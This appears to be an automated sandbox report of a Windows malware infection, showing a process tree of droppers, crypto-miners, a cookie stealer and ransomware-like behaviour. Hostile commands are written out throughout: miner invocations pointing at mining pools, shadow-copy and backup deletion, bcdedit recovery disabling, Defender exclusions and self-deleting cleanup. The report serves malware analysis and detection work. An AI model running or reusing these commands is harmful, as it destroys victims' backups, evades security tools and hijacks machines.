                                                                                              • C:\Users\Admin\AppData\Local\Temp\gnu5qtjb.nu1\toolspab1.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\gnu5qtjb.nu1\toolspab1.exe
                                                                                                7⤵
                                                                                                  PID:5040
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\gnu5qtjb.nu1\toolspab1.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\gnu5qtjb.nu1\toolspab1.exe
                                                                                                    8⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:6024
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ddeidlwn.evo\c7ae36fa.exe & exit
                                                                                                6⤵
                                                                                                  PID:5656
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ddeidlwn.evo\c7ae36fa.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\ddeidlwn.evo\c7ae36fa.exe
                                                                                                    7⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                    PID:6100
                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4356
                                                                                          • C:\Users\Admin\AppData\Roaming\56DB.tmp.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\56DB.tmp.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:4792
                                                                                            • C:\Users\Admin\AppData\Roaming\56DB.tmp.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\56DB.tmp.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks processor information in registry
                                                                                              PID:5044
                                                                                          • C:\Users\Admin\AppData\Roaming\5AB4.tmp.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\5AB4.tmp.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Adds Run key to start application
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:5028
                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                              -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w13084@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                              4⤵
                                                                                                PID:5476
                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w6279 --cpu-max-threads-hint 50 -r 9999
                                                                                                4⤵
                                                                                                • Blocklisted process makes network request
                                                                                                PID:5908
                                                                                            • C:\Users\Admin\AppData\Roaming\5CC9.tmp.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\5CC9.tmp.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              • Adds Run key to start application
                                                                                              PID:4240
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                              3⤵
                                                                                                PID:5240
                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                  ping 127.0.0.1
                                                                                                  4⤵
                                                                                                  • Runs ping.exe
                                                                                                  PID:5392
                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks whether UAC is enabled
                                                                                              PID:3764
                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4968
                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4816
                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • Modifies system certificate store
                                                                                                PID:4736
                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4396
                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                3⤵
                                                                                                  PID:2084
                                                                                            • c:\windows\system32\svchost.exe
                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                              1⤵
                                                                                                PID:1324
                                                                                              • c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                1⤵
                                                                                                  PID:1204
                                                                                                • c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                  1⤵
                                                                                                    PID:1076
                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                    1⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    PID:924
                                                                                                    • C:\Users\Admin\AppData\Roaming\haivruh
                                                                                                      C:\Users\Admin\AppData\Roaming\haivruh
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks SCSI registry key(s)
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      PID:5636
                                                                                                    • C:\Users\Admin\AppData\Roaming\cwivruh
                                                                                                      C:\Users\Admin\AppData\Roaming\cwivruh
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:4880
                                                                                                      • C:\Users\Admin\AppData\Roaming\cwivruh
                                                                                                        C:\Users\Admin\AppData\Roaming\cwivruh
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:6120
                                                                                                    • C:\Users\Admin\AppData\Roaming\haivruh
                                                                                                      C:\Users\Admin\AppData\Roaming\haivruh
                                                                                                      2⤵
                                                                                                      • Checks SCSI registry key(s)
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      PID:696
                                                                                                    • C:\Users\Admin\AppData\Roaming\cwivruh
                                                                                                      C:\Users\Admin\AppData\Roaming\cwivruh
                                                                                                      2⤵
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:1316
                                                                                                      • C:\Users\Admin\AppData\Roaming\cwivruh
                                                                                                        C:\Users\Admin\AppData\Roaming\cwivruh
                                                                                                        3⤵
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:1348
                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                      C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\orIRpJxOmHOi\orIRpJxOmHOi.dll",orIRpJxOmHOi
                                                                                                      2⤵
                                                                                                      • Windows security modification
                                                                                                      • Drops file in System32 directory
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:3560
                                                                                                    • C:\Users\Admin\AppData\Roaming\haivruh
                                                                                                      C:\Users\Admin\AppData\Roaming\haivruh
                                                                                                      2⤵
                                                                                                      • Checks SCSI registry key(s)
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      PID:5024
                                                                                                    • C:\Users\Admin\AppData\Roaming\cwivruh
                                                                                                      C:\Users\Admin\AppData\Roaming\cwivruh
                                                                                                      2⤵
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:5488
                                                                                                      • C:\Users\Admin\AppData\Roaming\cwivruh
                                                                                                        C:\Users\Admin\AppData\Roaming\cwivruh
                                                                                                        3⤵
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:2540
                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                    1⤵
                                                                                                      PID:1020
                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                      1⤵
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:1824
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                        2⤵
                                                                                                        • Drops file in System32 directory
                                                                                                        • Checks processor information in registry
                                                                                                        • Modifies data under HKEY_USERS
                                                                                                        PID:1944
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                      1⤵
                                                                                                      • Drops file in Windows directory
                                                                                                      • Modifies Internet Explorer settings
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:5096
                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                      1⤵
                                                                                                      • Modifies Internet Explorer settings
                                                                                                      PID:3812
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:6124
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                      • Modifies Internet Explorer settings
                                                                                                      • Modifies registry class
                                                                                                      PID:6048
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                      • Modifies registry class
                                                                                                      PID:5472
                                                                                                    • C:\Windows\system32\werfault.exe
                                                                                                      werfault.exe /h /shared Global\732ea78422564af6b36b83fc15b6e928 /t 204 /p 5472
                                                                                                      1⤵
                                                                                                        PID:2256
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        PID:5392
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                          PID:5196
                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                          1⤵
                                                                                                            PID:5168
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                            1⤵
                                                                                                              PID:5488
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2215.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\2215.exe
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Windows security modification
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              • Modifies system certificate store
                                                                                                              PID:5348
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1cab7ccb-f681-49c9-9bbe-2945ba64fcde\AdvancedRun.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1cab7ccb-f681-49c9-9bbe-2945ba64fcde\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\1cab7ccb-f681-49c9-9bbe-2945ba64fcde\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5416
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1cab7ccb-f681-49c9-9bbe-2945ba64fcde\AdvancedRun.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1cab7ccb-f681-49c9-9bbe-2945ba64fcde\AdvancedRun.exe" /SpecialRun 4101d8 5416
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:4708
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\2215.exe" -Force
                                                                                                                2⤵
                                                                                                                  PID:1052
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2215.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\2215.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Enumerates connected drives
                                                                                                                  PID:5236
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                    3⤵
                                                                                                                      PID:5732
                                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                        wmic shadowcopy delete
                                                                                                                        4⤵
                                                                                                                          PID:4744
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2215.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\2215.exe" -agent 0
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        • Modifies system certificate store
                                                                                                                        PID:4304
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\f7dbff80-557d-45f9-b0cb-66fcaa58db1a\AdvancedRun.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\f7dbff80-557d-45f9-b0cb-66fcaa58db1a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\f7dbff80-557d-45f9-b0cb-66fcaa58db1a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                          4⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:6108
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\f7dbff80-557d-45f9-b0cb-66fcaa58db1a\AdvancedRun.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\f7dbff80-557d-45f9-b0cb-66fcaa58db1a\AdvancedRun.exe" /SpecialRun 4101d8 6108
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5240
                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\2215.exe" -Force
                                                                                                                          4⤵
                                                                                                                            PID:5092
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\2215.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\2215.exe"
                                                                                                                            4⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:1232
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                                                                                                                          3⤵
                                                                                                                            PID:5440
                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                              wmic shadowcopy delete
                                                                                                                              4⤵
                                                                                                                                PID:5684
                                                                                                                              • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                vssadmin delete shadows /all /quiet
                                                                                                                                4⤵
                                                                                                                                • Interacts with shadow copies
                                                                                                                                PID:4172
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                              3⤵
                                                                                                                                PID:5140
                                                                                                                                • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                  vssadmin delete shadows /all /quiet
                                                                                                                                  4⤵
                                                                                                                                  • Interacts with shadow copies
                                                                                                                                  PID:5428
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                3⤵
                                                                                                                                  PID:576
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                  3⤵
                                                                                                                                    PID:200
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                                    3⤵
                                                                                                                                      PID:4888
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5236 -s 1816
                                                                                                                                      3⤵
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      • Program crash
                                                                                                                                      PID:4236
                                                                                                                                • C:\Windows\system32\vssvc.exe
                                                                                                                                  C:\Windows\system32\vssvc.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:5468
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\DDE4.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\DDE4.exe
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    PID:4988
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                      2⤵
                                                                                                                                        PID:2016
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\E40F.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\E40F.exe
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:1504
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\EB63.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\EB63.exe
                                                                                                                                      1⤵
                                                                                                                                      • Drops startup file
                                                                                                                                      • NTFS ADS
                                                                                                                                      PID:5448
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\EEB0.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\EEB0.exe
                                                                                                                                      1⤵
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      PID:5844
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\EEB0.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\EEB0.exe
                                                                                                                                        2⤵
                                                                                                                                        • Adds Run key to start application
                                                                                                                                        PID:5452
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\F354.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\F354.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:3900
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\F643.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\F643.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:5480
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\F7AC.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\F7AC.exe
                                                                                                                                          1⤵
                                                                                                                                          • Windows security modification
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          PID:5824
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1c145d9a-5bd3-4da5-8ef6-076be053fcf0\AdvancedRun.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1c145d9a-5bd3-4da5-8ef6-076be053fcf0\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\1c145d9a-5bd3-4da5-8ef6-076be053fcf0\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                            2⤵
                                                                                                                                              PID:5168
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1c145d9a-5bd3-4da5-8ef6-076be053fcf0\AdvancedRun.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1c145d9a-5bd3-4da5-8ef6-076be053fcf0\AdvancedRun.exe" /SpecialRun 4101d8 5168
                                                                                                                                                3⤵
                                                                                                                                                  PID:1212
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\F7AC.exe" -Force
                                                                                                                                                2⤵
                                                                                                                                                  PID:764
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\F7AC.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\F7AC.exe"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:2256
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F7AC.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\F7AC.exe"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4960
                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2188
                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:5604
                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:4388
                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                          1⤵
                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                          PID:6088
                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:296
                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                            PID:2204
                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:724
                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                              1⤵
                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                              PID:1312
                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              1⤵
                                                                                                                                                                PID:1528
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\33AC.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\33AC.exe
                                                                                                                                                                1⤵
                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                PID:504
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im 33AC.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\33AC.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:4464
                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                      taskkill /im 33AC.exe /f
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                      PID:3052
                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                      timeout /t 6
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                      PID:3940
                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                  PID:5860
                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                  PID:4964
                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                  PID:4640
                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                  PID:5192
                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                  PID:636
                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 636 -s 2016
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Program crash
                                                                                                                                                                    PID:5696
                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:3736
                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:1360

                                                                                                                                                                    Network

                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

